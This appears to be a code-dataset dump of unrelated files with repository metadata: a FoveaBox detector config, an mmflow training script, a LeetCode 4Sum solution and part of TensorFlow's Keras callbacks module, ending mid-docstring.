type="FOVEA",
backbone=dict(
type="ResNet",
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type="BN", requires_grad=True),
norm_eval=True,
style="pytorch",
init_cfg=dict(type="Pretrained", checkpoint="torchvision://resnet50"),
),
neck=dict(
type="FPN",
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
num_outs=5,
add_extra_convs="on_input",
),
bbox_head=dict(
type="FoveaHead",
num_classes=80,
in_channels=256,
stacked_convs=4,
feat_channels=256,
strides=[8, 16, 32, 64, 128],
base_edge_list=[16, 32, 64, 128, 256],
scale_ranges=((1, 64), (32, 128), (64, 256), (128, 512), (256, 2048)),
sigma=0.4,
with_deform=False,
loss_cls=dict(type="FocalLoss", use_sigmoid=True, gamma=1.50, alpha=0.4, loss_weight=1.0),
loss_bbox=dict(type="SmoothL1Loss", beta=0.11, loss_weight=1.0),
),
# training and testing settings
train_cfg=dict(),
test_cfg=dict(nms_pre=1000, score_thr=0.05, nms=dict(type="nms", iou_threshold=0.5), max_per_img=100),
)
data = dict(samples_per_gpu=4, workers_per_gpu=4)
# optimizer
optimizer = dict(type="SGD", lr=0.01, momentum=0.9, weight_decay=0.0001)
| [
"[email protected]"
] | |
6357de8a8bbeccf5484ff2c1b1e34b8452d63ff4 | 8a12d939f01a179c1fb8b7e72d8cb1c7d4970b6f | /tools/train.py | ebc65480c5fc9610caee60b39c0eafdd4661cecf | [
"Apache-2.0"
] | permissive | 459737087/mmflow | bebd2da1bd87e9b5b2a1a10ecdc61558978610d9 | a32f7af12f1a0d2ae3f962f4c94a4a1680c7a19e | refs/heads/master | 2023-09-03T03:04:40.010033 | 2021-11-18T04:35:06 | 2021-11-18T04:35:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,433 | py | # Copyright (c) OpenMMLab. All rights reserved.
import argparse
import copy
import os
import os.path as osp
import time
import mmcv
import torch
from mmcv import Config, DictAction
from mmcv.runner import init_dist
from mmcv.utils import get_git_hash
from mmflow import __version__
from mmflow.apis import set_random_seed, train_model
from mmflow.datasets import build_dataset
from mmflow.models import build_flow_estimator
from mmflow.utils import collect_env, get_root_logger
def parse_args():
parser = argparse.ArgumentParser(description='Train a flow estimator')
parser.add_argument('config', help='train config file path')
parser.add_argument('--work-dir', help='the dir to save logs and models')
parser.add_argument(
'--load-from', help='the checkpoint file to load weights from')
parser.add_argument(
'--resume-from', help='the checkpoint file to resume from')
parser.add_argument(
'--no-validate',
action='store_true',
help='whether not to evaluate the checkpoint during training')
group_gpus = parser.add_mutually_exclusive_group()
group_gpus.add_argument(
'--gpus',
type=int,
help='number of gpus to use '
'(only applicable to non-distributed training)')
group_gpus.add_argument(
'--gpu-ids',
type=int,
nargs='+',
help='ids of gpus to use '
'(only applicable to non-distributed training)')
parser.add_argument('--seed', type=int, default=None, help='random seed')
parser.add_argument(
'--deterministic',
action='store_true',
help='whether to set deterministic options for CUDNN backend.')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. If the value to '
'be overwritten is a list, it should be like key="[a,b]" or key=a,b '
'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" '
'Note that the quotation marks are necessary and that no white space '
'is allowed.')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
if args.cfg_options is not None:
cfg.merge_from_dict(args.cfg_options)
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
# work_dir is determined in this priority: CLI > config > default filename
if args.work_dir is not None:
# update configs according to CLI args if args.work_dir is not None
cfg.work_dir = args.work_dir
elif cfg.get('work_dir', None) is None:
# use config filename as default work_dir if cfg.work_dir is None
cfg.work_dir = osp.join('./work_dirs',
osp.splitext(osp.basename(args.config))[0])
if args.load_from is not None:
cfg.load_from = args.load_from
if args.resume_from is not None:
cfg.resume_from = args.resume_from
if args.gpu_ids is not None:
cfg.gpu_ids = args.gpu_ids
else:
cfg.gpu_ids = range(1) if args.gpus is None else range(args.gpus)
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# create work_dir
mmcv.mkdir_or_exist(osp.abspath(cfg.work_dir))
# dump config
cfg.dump(osp.join(cfg.work_dir, osp.basename(args.config)))
# init the logger before other steps
timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())
log_file = osp.join(cfg.work_dir, f'{timestamp}.log')
logger = get_root_logger(log_file=log_file, log_level=cfg.log_level)
# init the meta dict to record some important information such as
# environment info and seed, which will be logged
meta = dict()
# log env info
env_info_dict = collect_env()
env_info = '\n'.join([f'{k}: {v}' for k, v in env_info_dict.items()])
dash_line = '-' * 60 + '\n'
logger.info('Environment info:\n' + dash_line + env_info + '\n' +
dash_line)
meta['env_info'] = env_info
# log some basic info
logger.info(f'Distributed training: {distributed}')
logger.info(f'Config:\n{cfg.pretty_text}')
# set random seeds
if args.seed is not None:
logger.info(f'Set random seed to {args.seed}, deterministic: '
f'{args.deterministic}')
set_random_seed(args.seed, deterministic=args.deterministic)
cfg.seed = args.seed
meta['seed'] = args.seed
meta['exp_name'] = osp.basename(args.config)
model = build_flow_estimator(cfg.model)
model.init_weights()
logger.info(model)
if cfg.data.train_dataloader.get('sample_ratio') is None:
# build_dataset will concat the list of dataset
# so there is one dataset in the list
datasets = [build_dataset(cfg.data.train)]
else:
# the list of datasets is for Mixbatch
datasets = [[build_dataset(c) for c in cfg.data.train]]
if len(cfg.workflow) == 2:
val_dataset = copy.deepcopy(cfg.data.val)
val_dataset.pipeline = cfg.data.train.pipeline
datasets.append(build_dataset(val_dataset))
if cfg.checkpoint_config is not None:
# save mmflow version, config file content and class names in
# checkpoints as meta data
cfg.checkpoint_config.meta = dict(
mmflow_version=f'{__version__}+{get_git_hash()[:7]}',
config=cfg.pretty_text)
# add an attribute for visualization convenience
datasets_size = 0
for ds in datasets:
datasets_size += len(ds)
logger.info(f'dataset size {datasets_size}')
train_model(
model,
datasets,
cfg,
distributed=distributed,
validate=(not args.no_validate),
timestamp=timestamp,
meta=meta)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
73575c45ed55b4146558350ddb50d28b66091187 | 8ef5a09d76a11c56963f18e6a08474a1a8bafe3c | /leet_code/18. 4Sum.py | 972245f09f2573fa6cc14283b372bbd0b6f022b4 | [] | no_license | roiei/algo | 32c4677649c7666db148f6183fbfbf66c8b1969f | ae8bb8bf4ae4026ccaf1dce323b4098547dd35ec | refs/heads/master | 2022-04-01T19:21:27.768675 | 2022-02-19T06:15:29 | 2022-02-19T06:15:29 | 169,021,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,124 | py |
import time
from util.util_list import *
from util.util_tree import *
import copy
import collections
import bisect
class Solution:
def fourSum(self, nums: [int], target: int) -> [[int]]:
n = len(nums)
res = set()
nums.sort()
for i in range(n - 2):
for j in range(i + 1, n - 2):
l = j + 1
r = n - 1
acc = nums[i] + nums[j]
diff = target - acc
while l < r:
sum = nums[l] + nums[r]
if sum == diff:
res.add((nums[i], nums[j], nums[l], nums[r],))
l += 1
r -= 1
continue
if sum > diff:
r -= 1
elif sum < diff:
l += 1
        # convert the deduplicated tuples back to lists to match the declared return type
        return [list(quad) for quad in res]
stime = time.time()
print(sorted([
    [-2, -1, 1, 2],
    [-2, 0, 0, 2],
    [-1, 0, 0, 1]
]) == sorted(Solution().fourSum([1, 0, -1, 0, -2, 2], 0)))
print('elapse time: {} sec'.format(time.time() - stime)) | [
"[email protected]"
] | |
d009fd95134a3669c4c74320b9db66ee498878d4 | 81e706b69c789aff05691c41fa79156942927f82 | /site-packages/tensorflow/python/keras/callbacks.py | 5d086dc28d5ff15b78374ab770676dcc6059d4b8 | [] | no_license | yoncho/OpenCV-code | f5a1091ef32f3c8c3254ab93e083950b84c4fabd | bda2f793b11462e67c7ab644b342beffb871e3de | refs/heads/master | 2023-03-30T12:01:23.521511 | 2021-04-01T13:45:44 | 2021-04-01T13:45:44 | 291,398,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76,839 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Callbacks: utilities called at certain points during model training.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import csv
import io
import json
import os
import re
import tempfile
import time
import numpy as np
import six
from tensorflow.python.data.ops import iterator_ops
from tensorflow.python.distribute import distribute_coordinator_context as dc_context
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.utils.data_utils import Sequence
from tensorflow.python.keras.utils.generic_utils import Progbar
from tensorflow.python.keras.utils.mode_keys import ModeKeys
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import checkpoint_management
from tensorflow.python.util.tf_export import keras_export
try:
import requests
except ImportError:
requests = None
# Constant for `tf.keras.Model` to store the epoch at which the most recently
# saved checkpoint was saved. See `Model._get_updated_initial_epoch()`'s
# docstring for more information.
CKPT_SAVED_EPOCH = '_ckpt_saved_epoch'
def configure_callbacks(callbacks,
model,
do_validation=False,
batch_size=None,
epochs=None,
steps_per_epoch=None,
samples=None,
verbose=1,
count_mode='steps',
mode=ModeKeys.TRAIN):
"""Configures callbacks for use in various training loops.
Arguments:
callbacks: List of Callbacks.
model: Model being trained.
do_validation: Whether or not validation loop will be run.
batch_size: Number of samples per batch.
epochs: Number of epoch to train.
steps_per_epoch: Number of batches to run per training epoch.
samples: Number of training samples.
verbose: int, 0 or 1. Keras logging verbosity to pass to ProgbarLogger.
count_mode: One of 'steps' or 'samples'. Per-batch or per-sample count.
mode: String. One of ModeKeys.TRAIN, ModeKeys.TEST, or ModeKeys.PREDICT.
Which loop mode to configure callbacks for.
Returns:
Instance of CallbackList used to control all Callbacks.
"""
# Check if callbacks have already been configured.
if isinstance(callbacks, CallbackList):
return callbacks
if not callbacks:
callbacks = []
# Add additional callbacks during training.
if mode == ModeKeys.TRAIN:
model.history = History()
callbacks = [BaseLogger()] + (callbacks or []) + [model.history]
if verbose:
callbacks.append(ProgbarLogger(count_mode))
callback_list = CallbackList(callbacks)
# Set callback model
callback_model = model._get_callback_model() # pylint: disable=protected-access
callback_list.set_model(callback_model)
set_callback_parameters(
callback_list,
model,
do_validation=do_validation,
batch_size=batch_size,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
samples=samples,
verbose=verbose,
mode=mode)
callback_list.model.stop_training = False
# pylint: disable=protected-access
if callback_list.model._ckpt_saved_epoch is not None:
# The attribute `_ckpt_saved_epoch` is supposed to be None at the start of
# training (it should be made None at the end of successful multi-worker
# training), unless the user's `fit()` does not end successfully before
# making another `fit()` call.
raise ValueError(
'`tf.Keras.Model._ckpt_saved_epoch` attr should be None at '
'callback setup time. Please ensure `fit()` in multi-worker '
'training finishes successfully before starting a new one. If the '
'issue persists, try using only one `model.fit()` in multi-worker '
'training.')
return callback_list
def set_callback_parameters(callback_list,
model,
do_validation=False,
batch_size=None,
epochs=None,
steps_per_epoch=None,
samples=None,
verbose=1,
mode=ModeKeys.TRAIN):
"""Sets callback parameters.
Arguments:
callback_list: CallbackList instance.
model: Model being trained.
do_validation: Whether or not validation loop will be run.
batch_size: Number of samples per batch.
epochs: Number of epoch to train.
steps_per_epoch: Number of batches to run per training epoch.
samples: Number of training samples.
verbose: int, 0 or 1. Keras logging verbosity to pass to ProgbarLogger.
mode: String. One of ModeKeys.TRAIN, ModeKeys.TEST, or ModeKeys.PREDICT.
Which loop mode to configure callbacks for.
"""
for cbk in callback_list:
if isinstance(cbk, (BaseLogger, ProgbarLogger)):
cbk.stateful_metrics = model.metrics_names[1:] # Exclude `loss`
# Set callback parameters
callback_metrics = []
# When we have deferred build scenario with iterator input, we will compile
# when we standardize first batch of data.
if mode != ModeKeys.PREDICT and hasattr(model, 'metrics_names'):
callback_metrics = copy.copy(model.metrics_names)
if do_validation:
callback_metrics += ['val_' + n for n in model.metrics_names]
callback_params = {
'batch_size': batch_size,
'epochs': epochs,
'steps': steps_per_epoch,
'samples': samples,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
}
callback_list.set_params(callback_params)
def _is_generator_like(data):
"""Checks if data is a generator, Sequence, or Iterator."""
return (hasattr(data, 'next') or hasattr(data, '__next__') or isinstance(
data, (Sequence, iterator_ops.Iterator, iterator_ops.IteratorV2)))
def make_logs(model, logs, outputs, mode, prefix=''):
"""Computes logs for sending to `on_batch_end` methods."""
if mode in {ModeKeys.TRAIN, ModeKeys.TEST}:
if hasattr(model, 'metrics_names'):
for label, output in zip(model.metrics_names, outputs):
logs[prefix + label] = output
else:
logs['outputs'] = outputs
return logs
class CallbackList(object):
"""Container abstracting a list of callbacks.
Arguments:
callbacks: List of `Callback` instances.
queue_length: Queue length for keeping
running statistics over callback execution time.
"""
def __init__(self, callbacks=None, queue_length=10):
callbacks = callbacks or []
self.callbacks = [c for c in callbacks]
self.queue_length = queue_length
self.params = {}
self.model = None
self._reset_batch_timing()
def _reset_batch_timing(self):
self._delta_t_batch = 0.
self._delta_ts = collections.defaultdict(
lambda: collections.deque([], maxlen=self.queue_length))
def append(self, callback):
self.callbacks.append(callback)
def set_params(self, params):
self.params = params
for callback in self.callbacks:
callback.set_params(params)
def set_model(self, model):
self.model = model
for callback in self.callbacks:
callback.set_model(model)
def _call_batch_hook(self, mode, hook, batch, logs=None):
"""Helper function for all batch_{begin | end} methods."""
if not self.callbacks:
return
hook_name = 'on_{mode}_batch_{hook}'.format(mode=mode, hook=hook)
if hook == 'begin':
self._t_enter_batch = time.time()
if hook == 'end':
# Batch is ending, calculate batch time.
self._delta_t_batch = time.time() - self._t_enter_batch
logs = logs or {}
t_before_callbacks = time.time()
for callback in self.callbacks:
batch_hook = getattr(callback, hook_name)
batch_hook(batch, logs)
self._delta_ts[hook_name].append(time.time() - t_before_callbacks)
delta_t_median = np.median(self._delta_ts[hook_name])
if (self._delta_t_batch > 0. and
delta_t_median > 0.95 * self._delta_t_batch and delta_t_median > 0.1):
logging.warning(
'Method (%s) is slow compared '
'to the batch update (%f). Check your callbacks.', hook_name,
delta_t_median)
def _call_begin_hook(self, mode):
"""Helper function for on_{train|test|predict}_begin methods."""
if mode == ModeKeys.TRAIN:
self.on_train_begin()
elif mode == ModeKeys.TEST:
self.on_test_begin()
else:
self.on_predict_begin()
def _call_end_hook(self, mode):
"""Helper function for on_{train|test|predict}_end methods."""
if mode == ModeKeys.TRAIN:
self.on_train_end()
elif mode == ModeKeys.TEST:
self.on_test_end()
else:
self.on_predict_end()
def on_batch_begin(self, batch, logs=None):
self._call_batch_hook(ModeKeys.TRAIN, 'begin', batch, logs=logs)
def on_batch_end(self, batch, logs=None):
self._call_batch_hook(ModeKeys.TRAIN, 'end', batch, logs=logs)
def on_epoch_begin(self, epoch, logs=None):
"""Calls the `on_epoch_begin` methods of its callbacks.
This function should only be called during TRAIN mode.
Arguments:
epoch: integer, index of epoch.
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
logs = logs or {}
for callback in self.callbacks:
callback.on_epoch_begin(epoch, logs)
self._reset_batch_timing()
def on_epoch_end(self, epoch, logs=None):
"""Calls the `on_epoch_end` methods of its callbacks.
This function should only be called during TRAIN mode.
Arguments:
epoch: integer, index of epoch.
logs: dict, metric results for this training epoch, and for the
validation epoch if validation is performed. Validation result keys
are prefixed with `val_`.
"""
logs = logs or {}
for callback in self.callbacks:
callback.on_epoch_end(epoch, logs)
def on_train_batch_begin(self, batch, logs=None):
"""Calls the `on_train_batch_begin` methods of its callbacks.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Has keys `batch` and `size` representing the current batch
number and the size of the batch.
"""
self._call_batch_hook(ModeKeys.TRAIN, 'begin', batch, logs=logs)
def on_train_batch_end(self, batch, logs=None):
"""Calls the `on_train_batch_end` methods of its callbacks.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Metric results for this batch.
"""
self._call_batch_hook(ModeKeys.TRAIN, 'end', batch, logs=logs)
def on_test_batch_begin(self, batch, logs=None):
"""Calls the `on_test_batch_begin` methods of its callbacks.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Has keys `batch` and `size` representing the current batch
number and the size of the batch.
"""
self._call_batch_hook(ModeKeys.TEST, 'begin', batch, logs=logs)
def on_test_batch_end(self, batch, logs=None):
"""Calls the `on_test_batch_end` methods of its callbacks.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Metric results for this batch.
"""
self._call_batch_hook(ModeKeys.TEST, 'end', batch, logs=logs)
def on_predict_batch_begin(self, batch, logs=None):
"""Calls the `on_predict_batch_begin` methods of its callbacks.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Has keys `batch` and `size` representing the current batch
number and the size of the batch.
"""
self._call_batch_hook(ModeKeys.PREDICT, 'begin', batch, logs=logs)
def on_predict_batch_end(self, batch, logs=None):
"""Calls the `on_predict_batch_end` methods of its callbacks.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Metric results for this batch.
"""
self._call_batch_hook(ModeKeys.PREDICT, 'end', batch, logs=logs)
def on_train_begin(self, logs=None):
"""Calls the `on_train_begin` methods of its callbacks.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
for callback in self.callbacks:
callback.on_train_begin(logs)
def on_train_end(self, logs=None):
"""Calls the `on_train_end` methods of its callbacks.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
for callback in self.callbacks:
callback.on_train_end(logs)
def on_test_begin(self, logs=None):
"""Calls the `on_test_begin` methods of its callbacks.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
for callback in self.callbacks:
callback.on_test_begin(logs)
def on_test_end(self, logs=None):
"""Calls the `on_test_end` methods of its callbacks.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
for callback in self.callbacks:
callback.on_test_end(logs)
def on_predict_begin(self, logs=None):
"""Calls the 'on_predict_begin` methods of its callbacks.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
for callback in self.callbacks:
callback.on_predict_begin(logs)
def on_predict_end(self, logs=None):
"""Calls the `on_predict_end` methods of its callbacks.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
for callback in self.callbacks:
callback.on_predict_end(logs)
def __iter__(self):
return iter(self.callbacks)
@keras_export('keras.callbacks.Callback')
class Callback(object):
"""Abstract base class used to build new callbacks.
Attributes:
params: dict. Training parameters
(eg. verbosity, batch size, number of epochs...).
model: instance of `keras.models.Model`.
Reference of the model being trained.
validation_data: Deprecated. Do not use.
The `logs` dictionary that callback methods
take as argument will contain keys for quantities relevant to
the current batch or epoch.
Currently, the `.fit()` method of the `Model` class
will include the following quantities in the `logs` that
it passes to its callbacks:
on_epoch_end: logs include `acc` and `loss`, and
optionally include `val_loss`
(if validation is enabled in `fit`), and `val_acc`
(if validation and accuracy monitoring are enabled).
on_batch_begin: logs include `size`,
the number of samples in the current batch.
on_batch_end: logs include `loss`, and optionally `acc`
(if accuracy monitoring is enabled).
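  Example (a minimal sketch of a custom callback; `model`, `data` and
  `labels` are assumed to be defined elsewhere):
  ```python
  class LossPrinter(tf.keras.callbacks.Callback):
    def on_epoch_end(self, epoch, logs=None):
      # `logs` carries the metric results for the epoch that just ended.
      logs = logs or {}
      print('Epoch {}: loss = {}'.format(epoch, logs.get('loss')))
  model.fit(data, labels, epochs=10, callbacks=[LossPrinter()])
  ```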
"""
def __init__(self):
self.validation_data = None
self.model = None
# Whether this Callback should only run on the chief worker in a
# Multi-Worker setting.
# TODO(omalleyt): Make this attr public once solution is stable.
self._chief_worker_only = None
def set_params(self, params):
self.params = params
def set_model(self, model):
self.model = model
def on_batch_begin(self, batch, logs=None):
"""A backwards compatibility alias for `on_train_batch_begin`."""
def on_batch_end(self, batch, logs=None):
"""A backwards compatibility alias for `on_train_batch_end`."""
def on_epoch_begin(self, epoch, logs=None):
"""Called at the start of an epoch.
Subclasses should override for any actions to run. This function should only
be called during TRAIN mode.
Arguments:
epoch: integer, index of epoch.
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
def on_epoch_end(self, epoch, logs=None):
"""Called at the end of an epoch.
Subclasses should override for any actions to run. This function should only
be called during TRAIN mode.
Arguments:
epoch: integer, index of epoch.
logs: dict, metric results for this training epoch, and for the
validation epoch if validation is performed. Validation result keys
are prefixed with `val_`.
"""
def on_train_batch_begin(self, batch, logs=None):
"""Called at the beginning of a training batch in `fit` methods.
Subclasses should override for any actions to run.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Has keys `batch` and `size` representing the current batch
number and the size of the batch.
"""
# For backwards compatibility.
self.on_batch_begin(batch, logs=logs)
def on_train_batch_end(self, batch, logs=None):
"""Called at the end of a training batch in `fit` methods.
Subclasses should override for any actions to run.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Metric results for this batch.
"""
# For backwards compatibility.
self.on_batch_end(batch, logs=logs)
def on_test_batch_begin(self, batch, logs=None):
"""Called at the beginning of a batch in `evaluate` methods.
Also called at the beginning of a validation batch in the `fit`
methods, if validation data is provided.
Subclasses should override for any actions to run.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Has keys `batch` and `size` representing the current batch
number and the size of the batch.
"""
def on_test_batch_end(self, batch, logs=None):
"""Called at the end of a batch in `evaluate` methods.
Also called at the end of a validation batch in the `fit`
methods, if validation data is provided.
Subclasses should override for any actions to run.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Metric results for this batch.
"""
def on_predict_batch_begin(self, batch, logs=None):
"""Called at the beginning of a batch in `predict` methods.
Subclasses should override for any actions to run.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Has keys `batch` and `size` representing the current batch
number and the size of the batch.
"""
def on_predict_batch_end(self, batch, logs=None):
"""Called at the end of a batch in `predict` methods.
Subclasses should override for any actions to run.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Metric results for this batch.
"""
def on_train_begin(self, logs=None):
"""Called at the beginning of training.
Subclasses should override for any actions to run.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
def on_train_end(self, logs=None):
"""Called at the end of training.
Subclasses should override for any actions to run.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
def on_test_begin(self, logs=None):
"""Called at the beginning of evaluation or validation.
Subclasses should override for any actions to run.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
def on_test_end(self, logs=None):
"""Called at the end of evaluation or validation.
Subclasses should override for any actions to run.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
def on_predict_begin(self, logs=None):
"""Called at the beginning of prediction.
Subclasses should override for any actions to run.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
def on_predict_end(self, logs=None):
"""Called at the end of prediction.
Subclasses should override for any actions to run.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
@keras_export('keras.callbacks.BaseLogger')
class BaseLogger(Callback):
"""Callback that accumulates epoch averages of metrics.
This callback is automatically applied to every Keras model.
Arguments:
stateful_metrics: Iterable of string names of metrics that
should *not* be averaged over an epoch.
Metrics in this list will be logged as-is in `on_epoch_end`.
All others will be averaged in `on_epoch_end`.
"""
def __init__(self, stateful_metrics=None):
super(BaseLogger, self).__init__()
self.stateful_metrics = set(stateful_metrics or [])
def on_epoch_begin(self, epoch, logs=None):
self.seen = 0
self.totals = {}
def on_batch_end(self, batch, logs=None):
logs = logs or {}
batch_size = logs.get('size', 0)
# In case of distribution strategy we can potentially run multiple steps
# at the same time, we should account for that in the `seen` calculation.
num_steps = logs.get('num_steps', 1)
self.seen += batch_size * num_steps
for k, v in logs.items():
if k in self.stateful_metrics:
self.totals[k] = v
else:
if k in self.totals:
self.totals[k] += v * batch_size
else:
self.totals[k] = v * batch_size
def on_epoch_end(self, epoch, logs=None):
if logs is not None:
for k in self.params['metrics']:
if k in self.totals:
# Make value available to next callbacks.
if k in self.stateful_metrics:
logs[k] = self.totals[k]
else:
logs[k] = self.totals[k] / self.seen
@keras_export('keras.callbacks.TerminateOnNaN')
class TerminateOnNaN(Callback):
"""Callback that terminates training when a NaN loss is encountered.
"""
def on_batch_end(self, batch, logs=None):
logs = logs or {}
loss = logs.get('loss')
if loss is not None:
if np.isnan(loss) or np.isinf(loss):
print('Batch %d: Invalid loss, terminating training' % (batch))
self.model.stop_training = True
@keras_export('keras.callbacks.ProgbarLogger')
class ProgbarLogger(Callback):
"""Callback that prints metrics to stdout.
Arguments:
count_mode: One of "steps" or "samples".
Whether the progress bar should
count samples seen or steps (batches) seen.
stateful_metrics: Iterable of string names of metrics that
should *not* be averaged over an epoch.
Metrics in this list will be logged as-is.
All others will be averaged over time (e.g. loss, etc).
Raises:
ValueError: In case of invalid `count_mode`.
"""
def __init__(self, count_mode='samples', stateful_metrics=None):
super(ProgbarLogger, self).__init__()
if count_mode == 'samples':
self.use_steps = False
elif count_mode == 'steps':
self.use_steps = True
else:
raise ValueError('Unknown `count_mode`: ' + str(count_mode))
self.stateful_metrics = set(stateful_metrics or [])
def on_train_begin(self, logs=None):
self.verbose = self.params['verbose']
self.epochs = self.params['epochs']
def on_epoch_begin(self, epoch, logs=None):
self.seen = 0
if self.use_steps:
self.target = self.params['steps']
else:
self.target = self.params['samples']
if self.verbose:
if self.epochs > 1:
print('Epoch %d/%d' % (epoch + 1, self.epochs))
self.progbar = Progbar(
target=self.target,
verbose=self.verbose,
stateful_metrics=self.stateful_metrics,
unit_name='step' if self.use_steps else 'sample')
def on_batch_begin(self, batch, logs=None):
self.log_values = []
def on_batch_end(self, batch, logs=None):
logs = logs or {}
batch_size = logs.get('size', 0)
# In case of distribution strategy we can potentially run multiple steps
# at the same time, we should account for that in the `seen` calculation.
num_steps = logs.get('num_steps', 1)
if self.use_steps:
self.seen += num_steps
else:
self.seen += batch_size * num_steps
for k in self.params['metrics']:
if k in logs:
self.log_values.append((k, logs[k]))
# Skip progbar update for the last batch;
# will be handled by on_epoch_end.
if self.verbose and (self.target is None or self.seen < self.target):
self.progbar.update(self.seen, self.log_values)
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
for k in self.params['metrics']:
if k in logs:
self.log_values.append((k, logs[k]))
if self.verbose:
self.progbar.update(self.seen, self.log_values)
@keras_export('keras.callbacks.History')
class History(Callback):
"""Callback that records events into a `History` object.
This callback is automatically applied to
every Keras model. The `History` object
gets returned by the `fit` method of models.
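  Example (a minimal sketch; `model`, `data` and `labels` are assumed to be
  defined elsewhere):
  ```python
  history = model.fit(data, labels, epochs=10)
  # Per-epoch metric values are recorded in the `history` attribute.
  print(history.history['loss'])
  ```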
"""
def on_train_begin(self, logs=None):
self.epoch = []
self.history = {}
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
self.epoch.append(epoch)
for k, v in logs.items():
self.history.setdefault(k, []).append(v)
@keras_export('keras.callbacks.ModelCheckpoint')
class ModelCheckpoint(Callback):
"""Save the model after every epoch.
`filepath` can contain named formatting options,
  which will be filled with the value of `epoch` and
keys in `logs` (passed in `on_epoch_end`).
For example: if `filepath` is `weights.{epoch:02d}-{val_loss:.2f}.hdf5`,
then the model checkpoints will be saved with the epoch number and
the validation loss in the filename.
Arguments:
filepath: string, path to save the model file.
monitor: quantity to monitor.
verbose: verbosity mode, 0 or 1.
    save_best_only: if `save_best_only=True`, the model is only saved when the
      monitored quantity improves, so the latest best model is never
      overwritten.
mode: one of {auto, min, max}. If `save_best_only=True`, the decision to
overwrite the current save file is made based on either the maximization
or the minimization of the monitored quantity. For `val_acc`, this
should be `max`, for `val_loss` this should be `min`, etc. In `auto`
mode, the direction is automatically inferred from the name of the
monitored quantity.
save_weights_only: if True, then only the model's weights will be saved
(`model.save_weights(filepath)`), else the full model is saved
(`model.save(filepath)`).
save_freq: `'epoch'` or integer. When using `'epoch'`, the callback saves
      the model after each epoch. When using an integer, the callback saves
      the model at the end of the batch at which this many samples have been
      seen since the last save. Note that if saving isn't aligned to epochs, the
monitored metric may potentially be less reliable (it could reflect as
little as 1 batch, since the metrics get reset every epoch). Defaults to
      `'epoch'`.
load_weights_on_restart: Whether the training should restore the model. If
True, the model will attempt to load the checkpoint file from `filepath`
      at the start of `model.fit()`. This removes the need to manually call
      `model.load_weights()` before `model.fit()`. In multi-worker distributed
training, this provides fault-tolerance and loads the model
automatically upon recovery of workers. The callback gives up loading if
the filepath does not exist, and raises ValueError if format does not
match. Defaults to False.
**kwargs: Additional arguments for backwards compatibility. Possible key
is `period`.
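  Example (a minimal sketch; `model`, `data` and `labels` are assumed to be
  defined elsewhere):
  ```python
  checkpoint = tf.keras.callbacks.ModelCheckpoint(
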